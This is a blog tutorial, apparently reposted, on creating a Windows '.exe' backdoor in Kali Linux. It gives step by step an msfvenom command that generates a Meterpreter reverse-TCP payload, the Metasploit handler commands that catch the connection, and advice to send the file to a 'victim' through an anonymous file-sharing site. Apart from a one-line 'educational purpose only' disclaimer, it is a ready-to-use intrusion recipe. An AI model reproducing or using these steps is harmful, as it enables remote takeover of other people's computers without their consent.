banner



How To Create A Backdoor In Kali Linux

Backdoor is a software that can take access to a computer system without the concern of the user only if the user opens the backdoor application. This article deals about on How to create exe backdoor in kali linux

Here you will find how to make a create '.exe' backdoor

And I will show you all the listed commands that you can take access to the remote user.

Follow the steps on how to create exe backdoor in kali linux

Thus start with knowing your IP Address.

  • Click here if you don't know how to check IP address in Kali Linux
  • Open Terminal.
  • First type ifconfig to know your IP address (If you are connected with Ethernet cable you will find your IP in eth0 in the same way If you are connected with WiFi you will find your IP in wlan0).
  • As I am using Ethernet cable my IP will show in eth0 and my IP is under the red box.
ifconfig how to know your ip address in kali linux

Backdoor.exe creating procedure starts from here –

  • Type the commands written in bold and italic msfvenom -p windows/meterpreter/reverse_tcp lhost=(your ip address) lport=443 > /root/backdoor.exe then type enter (To get your kali linux IP address click here)
make simple exe backdoor in kali linux type msfvenom -p windows/
  • In port number you can type 4000, 4080, 443 etc but not greater than 65000.
  • backdoor.exe is the hacking exe program which will be used to hack windows. Which needs to be installed in windows of victim and victim needs internet connection (If there is no internet connection, hacking will not operate).
  • Apart from this you can share this file using various file sharing websites like Wetransfer (this website don't require user registration).
  • Finally You will find the backdoor.exe in Home directory.
Backdoor.exe
make simple exe backdoor in kali linux capy the backdoor.exe
backdoor.exe

Absolutely the last step

  • First type msfconsole and hit enter.
make simple exe backdoor in kali linux msfconsole menu
msfconsole
  • msfconsole menu will fire up, type use multi/handler hit enter
  • Type set payload windows/meterpreter/reverse_tcp hit enter
  • Type set lhost (IP which you type in making backdoor.exe) hit enter
set payload for simple exe backdoor
  • Then type set lhost (your ip) press enter and then type lport 443
  • And then type exploit
meterpreter session

Apart from this you can share this file using various file sharing websites like Wetransfer (this website don't require user registration). Now send the backdoor.exe file link to the user and wait for the user to open the backdoor, when the user opens the backdoor.exe a meterpreter session will start and then type help

After that you will find number of controls that are really amazing. Just copy the code of the given control and hurrey you got some tricks.

Warning

This is for educational purpose only. Hacking without permission is illegal and is punishable.

Thanks for visiting. KEEP SMILING.

How To Create A Backdoor In Kali Linux

Source: https://www.wormcorp.in/create-exe-backdoor-kali-linux-2020/

Posted by: williamsforem1954.blogspot.com

0 Response to "How To Create A Backdoor In Kali Linux"

Post a Comment

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel